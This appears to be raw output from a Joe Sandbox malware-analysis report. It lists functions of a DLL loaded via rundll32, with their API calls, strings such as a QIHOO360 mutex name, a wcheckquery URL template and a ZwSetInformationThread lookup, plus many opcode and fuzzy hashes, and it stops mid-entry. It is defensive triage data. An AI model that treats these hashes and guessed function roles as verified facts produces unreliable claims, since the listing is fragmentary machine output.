Opcode Fuzzy Hash: af5baddc67ad33526a33c39d65950fd72fb0df208da0cc0d422425bada8017cf
Instruction Fuzzy Hash: 5C81AFB3700B4882DE65CF15E8447E9A3A5F749BD4F54C222BA9D1B794EF7AD289C300

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800546E8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 175COMMON

Download Yara Rule

APIs

??2@YAPEAX_K@Z.MSVCRT ref: 00000001800547CD
??2@YAPEAX_K@Z.MSVCRT ref: 00000001800547FA
??3@YAXPEAX@Z.MSVCRT ref: 0000000180054933

Strings

%s\NameSpace_Catalog5\Catalog_Entries\%012d, xrefs: 00000001800546F0

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: ??2@$??3@
String ID: %s\NameSpace_Catalog5\Catalog_Entries\%012d
API String ID: 1245774677-2131870787
Opcode ID: dfcd8af31725850ee712bb16f67c2dba61d9d14ccc8acf01942b48f66b795e08
Instruction ID: ceb8e503b58a09837b0f64c0a513370a87b020a4d694bdf072cc47396662b60f
Opcode Fuzzy Hash: dfcd8af31725850ee712bb16f67c2dba61d9d14ccc8acf01942b48f66b795e08
Instruction Fuzzy Hash: 8251C47371579C82EE59CB16E5143EA6364B34DBD4F108626BEAD1BBC4DF39C2558300

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000C374 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 140synchronizationtimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000000018000C3B5
ReleaseMutex.KERNEL32 ref: 000000018000C520

Strings

__LastModified__, xrefs: 000000018000C43A
%I64d, xrefs: 000000018000C3DE

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: Time$FileMutexReleaseSystem
String ID: %I64d$__LastModified__
API String ID: 4233779698-1650611527
Opcode ID: 3e8cf2df84acdc051a18ea2821a1bd380114409e3e0b0fa2bea459e4e782fd62
Instruction ID: 09458c959511dc8cfabe6624f5c81a29e97a68172d7e622df1c6d3cc80163a48
Opcode Fuzzy Hash: 3e8cf2df84acdc051a18ea2821a1bd380114409e3e0b0fa2bea459e4e782fd62
Instruction Fuzzy Hash: FF518D72610A0986EB96DB39C8507ED33A0FB49BE8F448321BE3A476E5DF24C649C341

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180011110 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 132registryCOMMON

Download Yara Rule

APIs

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

RegOpenKeyExW.ADVAPI32 ref: 0000000180011234
RegQueryValueExW.ADVAPI32 ref: 0000000180011270
RegCloseKey.ADVAPI32 ref: 0000000180011280

Strings

dfafidjalkfjdalksjfjklfads, xrefs: 0000000180011165, 0000000180011186, 00000001800111E7

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: CloseHeapOpenProcessQueryValue
String ID: dfafidjalkfjdalksjfjklfads
API String ID: 3302636555-1647371548
Opcode ID: 48f47d4bc6a301fdbed38b274010a51a5309dac9b5fb3e5a400d4c7b3d944c6d
Instruction ID: 983dc216bf69003e419ddceaeab5995bac8f8453ed4f95b95033b7c069322061
Opcode Fuzzy Hash: 48f47d4bc6a301fdbed38b274010a51a5309dac9b5fb3e5a400d4c7b3d944c6d
Instruction Fuzzy Hash: 27515F32701E488AEB55DF65D8807CD33A0F789BD8F448229EA2D47BA5DF38C619C740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180048BC0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 123COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0000000180048C08

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

Part of subcall function 0000000180048D8C: _vsnwprintf_s.LEGACY_STDIO_DEFINITIONS ref: 0000000180048DAE

IsBadStringPtrW.KERNEL32 ref: 0000000180048CE6

Strings

error_code, xrefs: 0000000180048C48
com, xrefs: 0000000180048C0D, 0000000180048C4F

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: HeapProcessString_vsnwprintf_smemset
String ID: com$error_code
API String ID: 3912638396-1490343999
Opcode ID: cfaba8477e03315f3b12a173a0c847dc1424b74dc3d3080e5699b2adfcb71124
Instruction ID: a6db5d25ead79d5040835bfd854280f02b38994ac018b834727960b236b5b414
Opcode Fuzzy Hash: cfaba8477e03315f3b12a173a0c847dc1424b74dc3d3080e5699b2adfcb71124
Instruction Fuzzy Hash: E351D772601D4995EB82DB25D8803DE2360FB88BD8F55C212FE2D476E9DF34CA49C740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180009628 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(REGISTRY,00000000,?,?,00000000,00000000,?,0000000180009965), ref: 00000001800096CA
CoTaskMemFree.OLE32(REGISTRY,00000000,?,?,00000000,00000000,?,0000000180009965), ref: 00000001800097AC

Part of subcall function 0000000180008E20: lstrcmpiW.KERNEL32(?,?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000,00000000,?,0000000180009965), ref: 0000000180008EAC
Part of subcall function 0000000180008E20: lstrcmpiW.KERNEL32(?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000,00000000,?,0000000180009965), ref: 0000000180008EC6
Part of subcall function 0000000180008E20: lstrcmpiW.KERNEL32(?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000,00000000,?,0000000180009965), ref: 0000000180008F3D

CharNextW.USER32(?,?,00000002,?,?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000), ref: 000000018000978E

Strings

REGISTRY, xrefs: 0000000180009636

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: lstrcmpi$CharFreeNextTask
String ID: REGISTRY
API String ID: 1985931122-194740550
Opcode ID: bb15bb951ab1659f25d1c9209306eba5976eaacf2ee56a490b216cac227807d7
Instruction ID: 0428cfaf942490d5b21421b713593470094f21aa2117f0b0ab62b3aa4edd19b5
Opcode Fuzzy Hash: bb15bb951ab1659f25d1c9209306eba5976eaacf2ee56a490b216cac227807d7
Instruction Fuzzy Hash: 0041B27271A74982FBA2DF92A9407DA72A5B78CBC4F40C021BF4947795DF79CA59C300

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800676F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_CxxThrowException.MSVCRT ref: 0000000180067739
RaiseException.KERNEL32 ref: 0000000180067883
?terminate@@YAXXZ.MSVCRT ref: 00000001800678AF

Strings

csm, xrefs: 00000001800677AB

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: Exception$?terminate@@RaiseThrow
String ID: csm
API String ID: 1154302961-1018135373
Opcode ID: 23d955946db4149c996ac6419d5e890f38151984662b70a56131974dc9aa4251
Instruction ID: d6fa7f134f72d8ecd5f3bcd88c47d06a78e804b5116f597576f52de847c2c671
Opcode Fuzzy Hash: 23d955946db4149c996ac6419d5e890f38151984662b70a56131974dc9aa4251
Instruction Fuzzy Hash: 5D519531614BC88DE7668F28C8453E83361FF587A8F249211FA5D07A96EF35D785C340

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000D00C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000000018000D094
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 000000018000D132
GetLastError.KERNEL32 ref: 000000018000D13C

Strings

http://%s/wcheckquery, xrefs: 000000018000D012

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: CountCriticalErrorInitializeLastSectionSpinmemset
String ID: http://%s/wcheckquery
API String ID: 1980634866-481256882
Opcode ID: e44517d9abee306bf729d9c1b39ec77439867e7632e0484d40de2573647f887c
Instruction ID: d06bd9b14ce5bf28a863698d63a9b65a52eeb4a283bf68ad799e7df679026a35
Opcode Fuzzy Hash: e44517d9abee306bf729d9c1b39ec77439867e7632e0484d40de2573647f887c
Instruction Fuzzy Hash: 0841A032601B4996E7A2CF64E8403DA73E4F788BA4F548125EF8957794EF3CC659C350

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800353E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 99COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0000000180035465
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 0000000180035518
GetLastError.KERNEL32 ref: 0000000180035522

Strings

CLSID, xrefs: 0000000180035477

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: CountCriticalErrorInitializeLastSectionSpinmemset
String ID: CLSID
API String ID: 1980634866-910414637
Opcode ID: 7b2e34c13297d3253356bfea7e55ba0dc334a20ed8928643ae353c0c55a14f29
Instruction ID: 03153c84c80422bb1fe0896f106c581181dc8d0379737f626a13d6e79d0fde53
Opcode Fuzzy Hash: 7b2e34c13297d3253356bfea7e55ba0dc334a20ed8928643ae353c0c55a14f29
Instruction Fuzzy Hash: FF416C36201F8995E7A38F25E8403DA73A5F7887A4F598225EA9D433A4EF38C659C350

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180042088 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 86COMMON

Download Yara Rule

APIs

??_V@YAXPEAX@Z.MSVCRT ref: 00000001800421A6

Strings

nct, xrefs: 000000018004217C
emc, xrefs: 0000000180042137
mpt, xrefs: 0000000180042158

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID:
String ID: emc$mpt$nct
API String ID: 0-4018135154
Opcode ID: de2908332be039851882f27ba843e54a0a4e6a129764ff773922d891e26d8285
Instruction ID: 4437dbb73dbe2b615a95de1095330fd5d3d5a6b349df20e8dd5e5932057711ae
Opcode Fuzzy Hash: de2908332be039851882f27ba843e54a0a4e6a129764ff773922d891e26d8285
Instruction Fuzzy Hash: 00416872200B499AEB82DF71D8403DA37B0F3587D8F858912FA28976A9DF34C659C790

Uniqueness

Uniqueness Score: -1.00%

Function 000000018005CCA8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 000000018005CD59
GetProcAddress.KERNEL32 ref: 000000018005CD6E

Strings

ZwSetInformationThread, xrefs: 000000018005CD64
NTDLL.DLL, xrefs: 000000018005CD52

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: NTDLL.DLL$ZwSetInformationThread
API String ID: 1646373207-2735485441
Opcode ID: 42bcdad47f616cafdcd5b405ab44a7d36b4e0dac125c8dcdc21394efa803f9cc
Instruction ID: b89890f0d555bdc3e142d7496d6436052e72b1d505dadace56c849a3f497b7c1
Opcode Fuzzy Hash: 42bcdad47f616cafdcd5b405ab44a7d36b4e0dac125c8dcdc21394efa803f9cc
Instruction Fuzzy Hash: 10315472A04B8886E6829B24D5017E86760FB987C4F05E625FF5D62293EF35E7CCC311

Uniqueness

Uniqueness Score: -1.00%

Function 000000018005F014 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73synchronizationCOMMON

Download Yara Rule

APIs

ReleaseMutex.KERNEL32 ref: 000000018005F105

Strings

update sqlite_sequence set seq = 0 where name='MT';, xrefs: 000000018005F0DF
DELETE FROM 'MT', xrefs: 000000018005F06D
select * from sqlite_sequence;, xrefs: 000000018005F0A6

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: MutexRelease
String ID: DELETE FROM 'MT'$select * from sqlite_sequence;$update sqlite_sequence set seq = 0 where name='MT';
API String ID: 1638419-14785165
Opcode ID: 881e86d389d9cefced57cf04117e8820d9d165fbcb2647cbb323e1f898b7160a
Instruction ID: 2735ef6a2105b6c033439e84eaa5791c9d84b25ec53eae267885e45c8fb0a052
Opcode Fuzzy Hash: 881e86d389d9cefced57cf04117e8820d9d165fbcb2647cbb323e1f898b7160a
Instruction Fuzzy Hash: 2231CE32305B4982EAA59B64E5903AD6390F78CBE0F089224EF6D57BD1CF69CA598700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180067380 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 0000000180067418
??3@YAXPEAX@Z.MSVCRT ref: 000000018006742C
?terminate@@YAXXZ.MSVCRT ref: 0000000180067440

Strings

csm, xrefs: 00000001800673A2

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: ??3@?terminate@@free
String ID: csm
API String ID: 3373266647-1018135373
Opcode ID: d73ca4be5f3c30bec2958ddaeb0430c1daa0421a04bf28af6faf66de19823b01
Instruction ID: 594e821370d35c74b48cca41d1a30539acd19f7ec6fc8343c4dbd888121ab54a
Opcode Fuzzy Hash: d73ca4be5f3c30bec2958ddaeb0430c1daa0421a04bf28af6faf66de19823b01
Instruction Fuzzy Hash: 6F21F67230174881EFA69F29C4543B927A1EB49FD8F789521EA2D077D6CF29CA89C300

Uniqueness

Uniqueness Score: -1.00%

Function 000000018005C9F4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 62COMMON

Download Yara Rule

APIs

SHGetValueW.SHLWAPI ref: 000000018005CA65
_time64.MSVCRT ref: 000000018005CA9D

Strings

opentime_afterupdate, xrefs: 000000018005CA52
MsgCenter, xrefs: 000000018005CA28

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: Value_time64
String ID: MsgCenter$opentime_afterupdate
API String ID: 785988768-2434204715
Opcode ID: 5bb0f640ed1e05b6f5fb6319ad101f5784147dd22b425cd5bc3155a5095c0593
Instruction ID: fc05a4dbc7e4eba58b3f0245281c2719f95df9f8cff95e83ed4d87eeecbf7a83
Opcode Fuzzy Hash: 5bb0f640ed1e05b6f5fb6319ad101f5784147dd22b425cd5bc3155a5095c0593
Instruction Fuzzy Hash: F021A272600B4887E752CF28D4407897BA0F788BF4F508325BA69537E4DF34C649CB41

Uniqueness

Uniqueness Score: -1.00%

Function 000000018005CDD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_wcslwr.MSVCRT ref: 000000018005CE1F
memset.MSVCRT ref: 000000018005CE61
??2@YAPEAX_K@Z.MSVCRT ref: 000000018005CE89

Strings

Global\QIHOO360_%s, xrefs: 000000018005CE6B

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: ??2@_wcslwrmemset
String ID: Global\QIHOO360_%s
API String ID: 2483156104-3710684550
Opcode ID: 9be342a6d8c237716bffd5caf06391c6b8b6f70f0f13e01ce8d5a989816153c8
Instruction ID: 82c5ad46f6e7f4dabe07948ff870f9b922604b6aade2c66f9895ca3b1b8f50de
Opcode Fuzzy Hash: 9be342a6d8c237716bffd5caf06391c6b8b6f70f0f13e01ce8d5a989816153c8
Instruction Fuzzy Hash: 5821A171205B8881FBA6DB10E8553EA6360F7897D4F808221B69D077D5EF3DCA49C745

Uniqueness

Uniqueness Score: -1.00%

Function 000000018005B1FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 00000001800572CC: GetModuleHandleW.KERNEL32 ref: 00000001800572F3
Part of subcall function 00000001800572CC: GetProcAddress.KERNEL32 ref: 0000000180057303

SHSetValueW.SHLWAPI ref: 000000018005B2B6
SHSetValueW.SHLWAPI ref: 000000018005B2E2

Strings

MsgCenter, xrefs: 000000018005B21F, 000000018005B229, 000000018005B240, 000000018005B24A
opentime_traystartup, xrefs: 000000018005B2A3, 000000018005B2CF

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: Value$AddressHandleModuleProc
String ID: MsgCenter$opentime_traystartup
API String ID: 1929421221-2252518459
Opcode ID: 3abeb8fc91df8dd5900424b586f49943e6197e38022a5c10ccb5856e26316cfc
Instruction ID: b7589bd7c9edc25a710676dc7680ca351ec7a130bddfa3bcd3ac7e714d28a79a
Opcode Fuzzy Hash: 3abeb8fc91df8dd5900424b586f49943e6197e38022a5c10ccb5856e26316cfc
Instruction Fuzzy Hash: 5B216F72214A4882E751DF68E84478AB760FB897F4F408301F5BD53AE9DF78C299CB45

Uniqueness

Uniqueness Score: -1.00%

Function 000000018005B0F4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 59COMMON

Download Yara Rule

APIs

SHGetValueW.SHLWAPI ref: 000000018005B172
SHGetValueW.SHLWAPI ref: 000000018005B1C0

Strings

MsgCenter, xrefs: 000000018005B139
opentime_traystartup, xrefs: 000000018005B160, 000000018005B1AE

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: Value
String ID: MsgCenter$opentime_traystartup
API String ID: 3702945584-2252518459
Opcode ID: e7e1ea0997a0aebb528af51b835e443ca0a464db8d25fc4fd5322d43dc3a84cf
Instruction ID: 822726540527e7bff4823bd2222deb8b26a33040d1884c58a740bbbc5b89d818
Opcode Fuzzy Hash: e7e1ea0997a0aebb528af51b835e443ca0a464db8d25fc4fd5322d43dc3a84cf
Instruction Fuzzy Hash: A631C476201B488AEBA18F25D8443D937A4F7487ACF418715EA6C02BE8EF38C258C784

Uniqueness

Uniqueness Score: -1.00%

Function 000000018006A4C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52timeCOMMON

Download Yara Rule

APIs

sscanf.LEGACY_STDIO_DEFINITIONS ref: 000000018006A519
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,0000000180069AA1), ref: 000000018006A530
LocalFileTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,0000000180069AA1), ref: 000000018006A542

Strings

%hu-%hu-%hu %hu:%hu:%hu, xrefs: 000000018006A4FA

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: Time$File$LocalSystemsscanf
